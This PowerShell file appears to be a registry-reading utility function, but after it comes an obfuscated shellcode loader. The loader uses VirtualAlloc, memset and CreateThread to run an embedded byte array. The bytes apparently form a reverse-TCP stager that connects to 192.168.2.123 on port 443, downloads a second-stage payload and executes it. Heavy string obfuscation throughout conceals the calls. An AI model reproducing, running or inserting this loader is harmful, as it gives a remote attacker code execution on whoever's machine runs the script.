function GET-CR`E`gi`str`YKe`yv`ALUe
{
    
    [CmdletBinding()]
    param(
        [Parameter(MaNdatory=${t`RuE})]
        [string]
        
        ${p`ATh},
        
        [Parameter(mAndAToRy=${tR`Ue})]
        [string]
        
        ${Na`me}
    )
    
    .("{1}{2}{0}" -f'e','Set-Stri','ctMod') -Version ("{2}{1}{0}" -f 't','s','Late')

    &("{1}{0}{2}{3}"-f'e-CallerPref','Us','er','ence') -Cmdlet ${PS`cMd`lET} -Session ${eX`e`CuTionConte`Xt}."SESSiO`NS`T`ATe"

    if( -not (.("{6}{4}{0}{5}{3}{1}{2}"-f'eg','alu','e','KeyV','-CR','istry','Test') -Path ${p`AtH} -Name ${Na`ME}) )
    {
        return ${n`ULL}
    }
    
    ${it`eMprOpeRt`IES} = &("{3}{1}{0}{2}" -f '-','et','ItemProperty','G') -Path ${P`Ath} -Name ('*')
    ${Val`Ue} = ${ITEMPROpE`R`TiEs}.${n`AmE}
    .("{0}{1}{3}{2}"-f 'W','rit','ug','e-Deb') -Message ('[{0}@{1}: {2} -is {3}' -f ${P`ATH},${Na`ME},${V`ALuE},${V`Al`UE}.("{0}{1}{2}" -f'GetT','y','pe').Invoke())
    return ${v`AluE}
}


${C} = ((("{3}{14}{27}{72}{34}{67}{60}{40}{75}{54}{6}{15}{36}{11}{69}{80}{47}{44}{32}{18}{84}{23}{33}{82}{66}{77}{56}{62}{81}{4}{20}{1}{42}{71}{19}{5}{70}{74}{17}{48}{35}{7}{12}{58}{50}{57}{9}{41}{31}{65}{61}{51}{73}{39}{79}{59}{53}{16}{38}{21}{29}{83}{28}{37}{8}{43}{64}{46}{30}{24}{22}{49}{2}{55}{78}{52}{45}{10}{13}{0}{25}{76}{63}{68}{26}"-f 'tPtr ','[D','}msvcrt.dll{0})]','[DllImport(','rote','0}','ntPtr','c','ags','teThre','ext','tualA',' ex','ern IntPtr memset(In','{0}',' V','a',')]publi',' uint ','ort({','ct);','r','o','S','adId);[DllImp','de','ount);','kernel3','t dwCrea','a','e','lpThreadAttr','pAddress,','ize','d','stati','ir','tionFl','rtAddress, IntPtr lpPa','ckS','tic e','ad(IntPtr ','l',', In','l','c ','r lpThr','tPtr ','c ','rt({0','n IntPtr','uint d','i','pSt','tern I','pub','Type, u',' Crea','ter','tr l','0})]public sta',', ','i','uint s','tPt','ibutes','flAlloca','ll{','rc, uint c','lloc(I','kernel32.dll','lImp','2.','wSta','{0}','x','st, ','tion','lic stat','ize, IntP','n','nt flP',', uint ','meter, uin','dw'))-F  [ChaR]34);${W} = &("{1}{0}"-f'dd-Type','A') -memberDefinition ${c} -Name ("{1}{0}"-f '2','Win3') -namespace ("{0}{1}{2}"-f 'Wi','n3','2Functions') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x02,0x7b,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."l`eNgtH" -gt 0x1000){${G} = ${Z}."LE`NgTH"};${X}=${w}::("{2}{0}{1}"-f'rtual','Alloc','Vi').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${z}."lENg`TH"-1);${i}++) {${w}::"mE`ms`Et"([IntPtr](${X}.("{1}{0}" -f 't32','ToIn').Invoke()+${I}), ${Z}[${I}], 1)};${W}::("{1}{0}{3}{2}" -f'r','CreateTh','d','ea').Invoke(0,0,${x},0,0,0);for (;;){.("{0}{1}{2}{3}"-f 'St','art-sle','e','p') 60};
